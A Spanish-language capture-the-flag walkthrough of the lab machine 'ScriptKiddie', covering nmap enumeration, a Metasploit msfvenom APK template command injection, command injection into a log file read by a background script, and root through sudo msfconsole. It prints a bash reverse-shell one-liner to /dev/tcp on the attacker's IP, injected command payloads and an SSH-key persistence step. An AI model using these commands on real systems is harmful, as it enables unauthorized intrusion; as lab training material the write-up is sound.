# ScriptKiddie

**OS**: Linux \
**Dificultad**: Fácil \
**Puntos**: 20

## Resumen
- Msfvenom APK Template Command Injection
- Command Injection
- Msfconsole priv escalation

## Nmap Scan

`nmap -sC -sV -p- -oN nmap.txt 10.10.10.226`

```
Nmap scan report for 10.10.10.226
Host is up (0.066s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## Enumeración

Revisando el puerto 5000 encontramos una página que tiene 3 funcionalidades, el comando nmap, msfvemon y searchsploit.

![1](img/1.png)

Una de las características interesantes es el generador de payloads, por lo que podemos ver nos crea un archivo descargable dependiendo de sistema operativo seleccionado.

![2](img/2.png)

### Msfvenom APK Template Command Injection

Investigando acerca del tema, la versión de **Metasploit Framework <= 6.0.11** y **Metasploit Pro <= 4.18.0** es vulnerable a inyección de comandos utilizando el template de Android, suponiendo que el generador de payloads está utilizando una version vulnerable podemos conseguir una reverse shell.

Utilizaremos el módulo de Metasploit para generar nuestro apk malicioso.

- `use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection`
- `set LHOST 10.10.15.53`
- `set LPORT 1234`
- `run`

![3](img/3.png)

Ahora procedemos a poner a la escucha nuestro netcat y subir el payload.

![4](img/4.png)

- `nc -lvnp 1234`
- `python3 -c "import pty;pty.spawn('/bin/bash')"`
- `cat /home/kid/user.txt`

![5](img/5.png)

## Escalada de Privilegios

Para continuar con mayor comodidad copiamos nuestra llave pública SSH en el archivo authorized_keys.

- `ssh-keygen -t ed25519`
- `echo '<id_ed25519.pub>' >> /home/kid/.ssh/authorized_keys`

![6](img/6.png)

`ssh kid@10.10.10.226`

![7](img/7.png)

En el directorio **/home/pwn** encontramos un archivo interesante **scanlosers.sh** que se está ejecutando en background.

`cat /home/pwn/scanlosers.sh`

![8](img/8.png)

Vemos que está haciendo uso del archivo **/home/kid/logs/hackers** en el cual podemos escribir.

![9](img/9.png)

Testeando localmente el script encontramos la forma de obtener ejecución de comando. Hay que tomar en cuenta los 2 espacios en blanco antes de escribir.

- `echo '  ;ping -c 1 10.10.15.53;' > test`
- `log=test`
- `cat $log`
- `cat $log | cut -d' ' -f3-`
- `ip=$(cat $log | cut -d' ' -f3-)`
- `sh -c "nmap --top-ports 10 -oN recon/$ip.nmap"`

![10](img/10.png)

Ahora podemos obtener una reverse shell modificando **logs/hackers** en el sistema.

- `vi logs/hackers`
- `;bash -c 'bash -i >& /dev/tcp/10.10.15.53/4444 0>&1';`
- `nc -lvnp 4444`

![11](img/11.png)

Vemos que el usuario tiene permisos sudo para ejecutar **/opt/metasploit-framework-6.0.9/msfconsole**.

`sudo -l`

![12](img/12.png)

Podemos escalar fácilmente a root con el siguiente comando.

`sudo /opt/metasploit-framework-6.0.9/msfconsole -q -x bash`

![13](img/13.png)

## Referencias
https://www.rapid7.com/db/modules/exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection/ \
https://www.exploit-db.com/exploits/49491